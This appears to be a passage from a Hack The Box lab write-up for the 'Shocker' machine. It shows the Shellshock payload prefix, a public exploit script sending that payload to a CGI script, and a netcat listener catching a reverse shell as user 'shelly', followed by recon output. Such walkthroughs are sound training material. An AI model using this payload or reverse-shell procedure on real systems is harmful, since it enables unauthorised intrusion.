ShellShock
The target web application is hosting a bash script at /cgi-bin/user.sh, and it is confirmed to have the shellshock vulnerability
in the user-agent attribute, the actual exploit is the first part, () { :; }; alone
The highlighted echo ; part in the middle was added to show the output of the last part, echo "VULNERABLE TO SHELLSHOCK"
Exploitation
┌──(kali㉿kali)-[~/archive/htb/labs/shocker]
└─$ python3 CVE-2014-6271/shellshock.py 10.10.14.12 9999 http://$IP/cgi-bin/user.sh
[...REDACTED...]
[+] Protocol detected: HTTP
[+] Setting Payload ...
[+] Sending Payload to http://10.10.10.56/cgi-bin/user.sh ...
[-] Request: timed out received HTTP code 500
[+] Reverse shell from 10.10.10.56 connected to [10.10.14.12:9999].
[+] Payload Sent successfully !Launching the exploit
The exploit sent out the GET request with the payload in pretty much all the headers
┌──(kali㉿kali)-[~/archive/htb/labs/shocker]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.56] 44986
whoami
shelly
hostname
Shocker
ifconfig
ens192 Link encap:Ethernet HWaddr 00:50:56:b9:63:7b
inet addr:10.10.10.56 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: dead:beef::250:56ff:feb9:637b/64 Scope:Global
inet6 addr: fe80::250:56ff:feb9:637b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:161285 errors:0 dropped:78 overruns:0 frame:0
TX packets:160660 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:29200140 (29.2 MB) TX bytes:74418258 (74.4 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:27840 errors:0 dropped:0 overruns:0 frame:0
TX packets:27840 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:2061552 (2.0 MB) TX bytes:2061552 (2.0 MB)Initial Foothold established to the target system as the shelly user via exploiting the shellshock vulnerability present in the target web application